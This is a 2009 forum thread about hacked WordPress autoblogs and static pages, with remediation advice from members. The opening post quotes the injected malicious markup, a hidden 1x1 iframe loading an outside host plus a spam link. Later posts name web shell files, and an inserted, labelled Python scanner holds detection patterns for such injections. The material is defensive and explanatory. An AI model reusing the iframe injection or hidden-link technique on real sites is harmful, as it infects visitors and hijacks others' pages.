Blogs Hacked

Discussion in 'Blogging' started by Mage, Apr 4, 2009.

  1. Mage

    Mage Junior Member

    Joined:
    Jan 31, 2008
    Messages:
    150
    Likes Received:
    18
    Over the last few days, a good friend of mine who has built some 50 auto blogs found most of the blogs hacked. Despite reinstalling WP, the problems still persisted and she even found some of her blogs listed as "warning" sites in Google.

    I guess WordPress has its weaknesses even in 2.7. But I found that even static pages had the problem. Some had the following added to the page after they blanked the page.

    <font face=Arial size=3 color=#F0EEEC><a href=http://eroticXXweb.ru>ïîðíî</a></font></p><iframe frameborder=0 border=0 height=1 width=1 src="http://bublik.biz/in.cgi?2" /></body>
    </html>

    She's really upset as she's been working hard to try to earn some money to pay for some medical bills of a family member. Some of her sites have PR and thousands of pages indexed.

    Has anyone had similar problems before?
     
  2. istuff

    istuff Junior Member

    Joined:
    Mar 2, 2009
    Messages:
    138
    Likes Received:
    47
    Occupation:
    Cookie Stuffing
    Location:
    Toronto
    Something is probably wrong with her host. Maybe they're not secure enough. You can build a site at www.blazingblogs.net

    It allows you to put in your own AdSense/YPN and it's free
     
  3. The Scarlet Pimp

    The Scarlet Pimp Jr. VIP Jr. VIP Premium Member

    Joined:
    Apr 2, 2008
    Messages:
    788
    Likes Received:
    3,129
    Occupation:
    Chair moistener.
    Location:
    Cyberspace
    1. Who is she hosting with?

    2. Perhaps she should switch to Joomla or Drupal.
     
  4. RevolWerx

    RevolWerx Newbie

    Joined:
    Oct 28, 2008
    Messages:
    38
    Likes Received:
    13
    Occupation:
    Network Administrator
    Location:
    NJ
    Home Page:
    1. Change hosting account password.
    2. Change the password for FTP access on all accounts.
    3. Change database passwords and update WordPress wp-config.php files.
    4. Use strong passwords and non-guessable user names.
    5. Secure wp-admin folder via .htaccess to only allow her IP to access that area.
    6. In WordPress, create a new user with Administrator permissions and use a nickname not related to the account name, copy posts to that new user account, then delete the admin account.
    7. Check log files for evidence and block those IPs if possible.
     
    • Thanks Thanks x 1
  5. Maxell

    Maxell Regular Member

    Joined:
    May 10, 2007
    Messages:
    456
    Likes Received:
    563
    If someone has already uploaded a shell, then it doesn't matter how many times you change the password; they will keep doing it regardless of your password. Check the logs to see which files are being accessed. It's difficult, but she will have to check all folders to find any suspicious files, e.g. r57.php, c100shell.php, etc.
     
  6. Mage

    Mage Junior Member

    Joined:
    Jan 31, 2008
    Messages:
    150
    Likes Received:
    18
    You're right. Even when she changes passwords and removes any unknown files, it comes back in another form. Most of the sites, on checking with whois, have Russian servers.

    It's really an awakening for me as I have heard of this kind of thing but not actually seen it happen. She only started noticing when she found her ClickBank sales going to zero for a few days.

    Anyone doing WP, especially autoblogs, should take care as it is very depressing to suddenly find all your blogs and income gone.

    The question I have for those of you who know computing is, is it safe to reinstall using the present database? It is just too difficult to look for all those .php files as there are so many hiding everywhere.
     
  7. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    I have the same problem also.
    Not all blogs affected. Some.
    Nothing to do with same host or not.
    I think they just randomly pick WordPress and hack through some security loophole.
     
  8. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    It added code like below to the footer of blogs.
    Removed, and the next day it was automatically added again.
    Help needed!!! Please!!!

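
A file-tree triage pass of the kind suggested earlier in the thread (look for shell file names), extended to the two kinds of injected markup reported here: a 1x1 iframe, and a hidden link block opened and closed by the same hex comment. This is an added example, not part of any post; `scan_tree`, `demo`, the patterns and the sample tree with its `*.example` hosts are constructed for illustration, and the patterns are heuristics, so a hit means "review this file", not proof of compromise.

```python
import re
import tempfile
from pathlib import Path

# Shell file names mentioned in the thread; extend with your own list.
SHELL_NAMES = {"r57.php", "c100shell.php"}
TEXT_EXT = {".php", ".html", ".htm", ".js"}
# Triage patterns modelled on the injected markup reported in the thread.
PATTERNS = {
    "marker-wrapped block": re.compile(
        r"<!--\s*([0-9a-f]{32})\s*-->.*?<!--\s*\1\s*-->", re.I | re.S),
    "hidden link container": re.compile(
        r"<\w+[^>]*style\s*=\s*[\"'][^\"']*display\s*:\s*none[^>]*>\s*<a\s", re.I),
    "1x1 iframe": re.compile(
        r"<iframe\b(?=[^>]*\bheight\s*=\s*[\"']?[01]\b)"
        r"(?=[^>]*\bwidth\s*=\s*[\"']?[01]\b)", re.I),
}

def scan_tree(root):
    """Return sorted (relative_path, finding) pairs for files under root."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name.lower() in SHELL_NAMES:
            findings.append((rel, "known shell file name"))
        if path.suffix.lower() in TEXT_EXT:
            text = path.read_text(encoding="latin-1")  # latin-1 decodes any bytes
            findings += [(rel, label) for label, rx in PATTERNS.items() if rx.search(text)]
    return sorted(findings)

def demo():
    """Scan a constructed sample tree; every file body below is made up."""
    marker = "0123456789abcdef0123456789abcdef"
    sample = {
        "index.php": "<?php get_header(); ?><div style='display:none' id='menu'></div>",
        "wp-content/themes/t/footer.php": f'<!-- {marker} --><u style="display: none;">'
            f'<a href="http://spam.example/a.htm">a</a>, </u><!-- {marker} --></body>',
        "static/about.html": '<p>hi</p><iframe height=1 width=1 src="http://bad.example/" />',
        "wp-content/uploads/r57.php": "<?php /* placeholder, not a real shell */ ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in sample.items():
            path = Path(root, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body, encoding="latin-1")
        return scan_tree(root)

if __name__ == "__main__":
    print(*(f"{rel}: {finding}" for rel, finding in demo()), sep="\n")
```

Pointing `scan_tree` at a copy of the site's document root gives a short list of files to open first; comparing the remaining core files against a fresh download of the same WordPress version covers what the patterns miss.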
     
  9. alderous

    alderous Regular Member Premium Member

    Joined:
    Jul 23, 2007
    Messages:
    325
    Likes Received:
    74
    You need to reset your SQL! Otherwise it'll keep coming back.
     
  10. soctal

    soctal Regular Member

    Joined:
    Jul 28, 2008
    Messages:
    243
    Likes Received:
    76
    I remember reading a tip from the Tim Ferriss book 4-Hour Workweek, where he suggested that since hosting is so economical you should keep your sites backed up and duplicated on another host, so if you are ever hacked you can just move to the duplicated site. There is a service where you can move your domain in 5 minutes instead of the usual 24 hours or something like that.
    It's one of those things I plan to do with at least the most crucial sites once I actually start to make money.
     
  11. soctal

    soctal Regular Member

    Joined:
    Jul 28, 2008
    Messages:
    243
    Likes Received:
    76
    I can't seem to delete this duplicated post. I'll have to ask the mod how to do that.
     
    Last edited: Apr 5, 2009
  12. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    Can you explain in more detail?
    You said everything without any links or crucial information.
    What service is that?
    Any detailed steps on your plan?
    Thanks!
     
  13. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    Home Page:
    Most people use cheap hosting providers for this type of "job" like autoblogs. The thing is, a cheap price always brings weakness with it; more than that, most people aren't using any antivirus or any security tool to protect their computers. What's the problem there? It seems some guys just got access to your hosting accounts / WP admin and passwords and so on. There's nothing better to do than first of all clean your computers and try to use a strong antivirus solution (personally I always prefer McAfee, and I haven't had viruses on my computers since '99 :) ). The second step is to take a look and do your homework about the "right hosting company". Always try to avoid "free hosting accounts" (except the established ones well known for their good reputation, like free wordpress.org hosting, Blogger, and so on). Otherwise just go for shared hosting accounts; even if they are cheap, you can use reputable hosting companies. Changing all passwords (for email accounts, online bank accounts, everything) once you have a clean computer is a must at this point. Start to remake all those blogs/splogs/autoblogs, whatever you wish to call them. Try to use decent password combos and avoid using one password for all your accounts (for example, never use the same password for your email address as for hosting accounts or WP admin). Securing ./wp-admin/ via htaccess is also a good way to protect them, and most important: learn the lessons :)
     
    • Thanks Thanks x 1
  14. Maxell

    Maxell Regular Member

    Joined:
    May 10, 2007
    Messages:
    456
    Likes Received:
    563
    Check the wp-config.php file; since it's writable, most of the hackers add this code at the end of this file.
     
  15. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    It's added in the footer.php file.
    I don't think they hack into the server or personal PC for passwords or anything.
    I have the same setting for a few blogs, under the same host.
    20% affected, the rest okay. Same plugin, same login.
    I think they randomly search for WordPress blogs and put in some code to hack them.
    It seems like the hack will automatically recover itself whenever it notices the spam links were removed.
     
  16. falcommoney

    falcommoney Junior Member

    Joined:
    Jan 11, 2009
    Messages:
    127
    Likes Received:
    62
    Scan the computer, your friend might be infected.
     
  17. Carnagge

    Carnagge Registered Member

    Joined:
    Dec 23, 2007
    Messages:
    97
    Likes Received:
    9
    I know what it is - we have a problem with this and are discussing it on another forum.

    It's some kind of trojan/virus which steals the FTP access passwords you have saved on your computer, mainly from Total Commander. Change passwords and use FileZilla.
    Also scan your PC and try to find these bastards.
     
  18. FreeTheTV

    FreeTheTV BANNED BANNED

    Joined:
    Mar 1, 2009
    Messages:
    561
    Likes Received:
    1,198
    Blogger > Wordpress.
     
  19. iglow

    iglow Elite Member

    Joined:
    Feb 20, 2009
    Messages:
    2,080
    Likes Received:
    856
    Home Page:
    No, it's not about passwd. It's a known vulnerability in WordPress. Update to the latest version + find the code pasted atm and delete.
     
  20. jiajilah

    jiajilah Junior Member

    Joined:
    Jun 6, 2008
    Messages:
    138
    Likes Received:
    122
    Having the latest WordPress 2.7.1
    Having the same problem as well.